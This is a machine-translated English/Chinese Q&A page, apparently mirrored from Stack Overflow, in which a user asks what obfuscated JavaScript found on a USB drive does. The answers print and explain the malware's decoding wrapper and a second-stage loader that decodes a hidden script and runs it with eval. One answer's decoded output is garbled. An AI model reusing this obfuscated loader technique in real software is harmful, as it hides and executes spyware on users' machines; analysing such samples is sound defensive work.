混淆的Javascript代码?
[英]Obfuscated Javascript code?
问题描述
So a friend of mine had this strange piece of code on his pendrive (probably put by a malware on his computer). 
因此,我的一个朋友的笔式驱动器上有这段奇怪的代码(可能是由计算机上的恶意软件输入的)。 What it did interested me is that the code in question is written in obfuscated Javascript (with a obfuscated piece of autorun.inf to probably infected vulnerable hosts), and beside by that, it didn't had any other strange files (I used ClamAV on his pendrive, no malware found). 它令我感兴趣的是,所讨论的代码是用模糊的Javascript编写的(带有一段模糊的autorun.inf可能感染了易受感染的主机),此外,它没有任何其他奇怪的文件(我使用了ClamAV在他的笔式驱动器上,未发现恶意软件)。
If it helps, the program in question is located on 77 folder of the pendrive, and had two copies (it was exactly the same), each one with a somewhat random filename (see below). 如果有帮助,该程序位于pendrive的77文件夹中,并具有两个副本(完全相同),每个副本都有一个有点随机的文件名(请参见下文)。 The autorun.inf is obviously found on root. autorun.inf显然是在根目录上找到的。
Can someone explain to me what this piece of code does? 有人可以向我解释这段代码的作用吗? The only modification I did is using jsbeautifier.org to indent this code (it was a one line code before). 我所做的唯一修改是使用jsbeautifier.org将此代码缩进(之前是一行代码)。
Main program (77/g66ac.js & 77/i6a6a.js): http://pastebin.com/uj0xSV1e
autorun.inf: http://pastebin.com/Aqnmtiq6
Sorry, I couldn't post the whole code on this topic since it broke the character limit so I had to put it on pastebin. 抱歉,由于该字符超出了字符数限制,因此无法将整个代码发布到该主题上,因此我不得不将其放在pastebin上。
2 个解决方案
解决方案1
3 已采纳 2013-09-05 20:30:05
I've looked into the code and did some investigation. 我研究了代码并进行了一些调查。 It's more a comment than a answer but way to long for a comment so here it is: 它不是评论,而是答案,而是想发表评论的方式,所以这里是:
(function (paramA, paramB, paramC, paramD) {
someVar = "";
try {
paramB = paramB.replace(/[^A-Z0-9]+/gi, ""), paramB = paramB.split([]), someVar = document;
return
} catch (e) {
for (i = 0; i < paramB.length; i += 2)
someVar += String.fromCharCode(paramA(paramB[i] + paramB[i + 1], 29));
String.fromCharCode.constructor(someVar)(paramC, paramD)
}
})(parseInt, string1, string2, string3)
The first view steps alter the text and make one big char array out of it. 第一个视图步骤将更改文本并从中生成一个大字符数组。 Than a exception is throwen and we continue in the loop. 抛出异常之后,我们继续循环。 The loop creates a new string via the parseInt. 循环通过parseInt创建一个新字符串。 It takes one char and the next one from the array and creates a base 29 number out of it. 它从数组中取出一个字符和下一个字符,并从中创建一个以29为底的数字。
The line String.fromCharCode.constructor(someVar)(paramC, paramD); 行String.fromCharCode.constructor(someVar)(paramC,paramD);
is tricky. 很棘手。 Because it takes someVar which is a string containing a JS code, creating with the constructor function an anonymous function which gets called with paramC and paramD. 因为它需要someVar,这是一个包含JS代码的字符串,所以使用构造函数创建一个匿名函数,该匿名函数将被paramC和paramD调用。
The code generated looks like that: 生成的代码如下所示:
kPxRViGad8nHNstI$BVr8Lf="";(function(rycgnpqpq,rycgyjqpq,rycggoqpq,rycglpqpq){rycgnpqpq=rycglpqpq(rycgnpqpq),rycgyjqpq=rycglpqpq(rycgyjqpq);try{eval(rycggoqpq("5eb9485dd4a658f8bf9318976cd9832392d4904d",rycgyjqpq))}catch(rycgbsqpq){}})(arguments[0],arguments[1],function(rycgxhqpq,rycgmfqpq){rycgniqpq="";for(rycgqdqpq=0;rycgqdqpq<rycgmfqpq.length;rycgqdqpq++)rycgniqpq+=String.fromCharCode(rycgxhqpq.charCodeAt(rycgqdqpq%rycgxhqpq.length)^rycgmfqpq.charCodeAt(rycgqdqpq));return rycgniqpq},function(rycgunqpq){rycgfyqpq={},rycgunqpq=rycgunqpq.replace(/[^+A-Z0-9\/]+/gi,""),rycguwqpq="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";for(rycgowqpq=0,rycggdqpq=rycguwqpq.length;rycgowqpq<rycggdqpq;rycgowqpq++)rycgfyqpq[rycguwqpq.charAt(rycgowqpq)]=rycgowqpq;rycgdzqpq=[];for(rycgorqpq=0,rycgrfqpq=rycgunqpq.length;rycgorqpq<rycgrfqpq;rycgorqpq+=4)rycguuqpq=(rycgfyqpq[rycgunqpq.charAt(rycgorqpq)]||0)<<18|(rycgfyqpq[rycgunqpq.charAt(1+rycgorqpq)]||0)<<12|(rycgfyqpq[rycgunqpq.charAt(rycgorqpq+2)]||0)<<6|(rycgfyqpq[rycgunqpq.charAt(3+rycgorqpq)]||0),rycgdzqpq.push(rycguuqpq>>16,rycguuqpq>>8&255,rycguuqpq&255);return rycgdzqpq.length-=[0,0,2,1][rycgunqpq.length%4],String.fromCharCode.apply(String,rycgdzqpq)});
This is a multiple nested function. 这是一个多重嵌套函数。 It ultimatly creates a very big script and runs it within an eval. 它最终创建了一个非常大的脚本,并在一个评估中运行它。 The third script looks like some spy script because it contains strings like homepage_is_newtabpage, last_prompted_google_url, stackoverflow, facebook, etc. 第三个脚本看起来像一些间谍脚本,因为它包含诸如homepage_is_newtabpage,last_prompted_google_url,stackoverflow,facebook等字符串。
解决方案2
2 2013-09-05 20:18:03
It's a fail of some sort--it's trying to rewrite the document with something that's probably a phishing or ransomware redirect, but it doesn't work correctly. 这是某种失败-尝试使用可能是网络钓鱼或勒索软件重定向的内容重写文档,但无法正常工作。
[object HTMLDocument]kPxRViGĥź̒ʝstI$B̯̐̑f="";(functioʜ?rş?npqpq,rycgyjqpq,rycggoq˘˳ƶ̓Ǔɤ˘˵˘˳ŠÎ̓şǓʞqpq=rycglpqpq(rycgnp˵q),rcǔȪpq=rycgl˘˵˘˳ł̓g?qp˳Ştry{eval(rycggoqpq(ʻƙŀ̭ʜ5dd4a658f8bf9318̭˳˘şź̭̐ɿ392d4̭Ȩʞźƶ̓şǔȪ˵˘˳ŝ}catchł̓şǓł̯˵˘˳ŠÏĉĆŝłĥ̒ǔ ʁƙʟ̯uȪ¯ƶĥ̒ǔ ʁƙʟ̯uɇ¯ƶƷ ʞŠion(rycgwǰ˵˘˳ƶ̓şǓʁƶ˵q){rycǓʞȍ˵˘˴"";for(rycǓ˵ż˵˘˴0;̓cgqdqpq>̐Ćɢʹʹƶ̓guuqpq&255);return rycgdzqpq.lenǔǮǒZuȨƴ?,2ƴɇ±w̓şǔ ʞ˵˘.lengtǮéʞ¯Ƶ˙̒ȍʞǑǰ?romCharĈʻżƗǰĥ˘˘ɥŁtrinǑ?rycgdz˵˘)}); [object HTMLDocument]kPxRViGĥź̒ʝstI$B̯̐̑f=“”;(功能? eval(rycggoqpq(ʻƙŀ̭ʜ5dd4a658f8bf9318̭˳˘şź̭̐ɿ392d4̭Ȩʞźƶ̓şǔȪ˵˘˳ŝ}catchł̓şǓł̯˵˘˳Š̯˵˘˳łĥ̒ǔʁƙʟ̯uȪ¯ƶĥ̒ǔʁƙʟ̯uɇ¯ƶƷŠion(rycgw {şǓʞȍ˵˘˴q){rycǓʞȍ˵˘˴“”; for(rycǓ˵ż˵˘˴ 0;̓cgqdqpq> ̐Ćɢʹʹƶ̓guuqpq&255);返回rycgdzqpq.lenǔǮǒZuȨƴ?,2ƴɇ±w̓şǔʞ˵˘.lengtǮéʞé?romCharĈʻżƗǰĥ˘˘ɥŁtrinǑ?rycgdz˵˘)}));
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.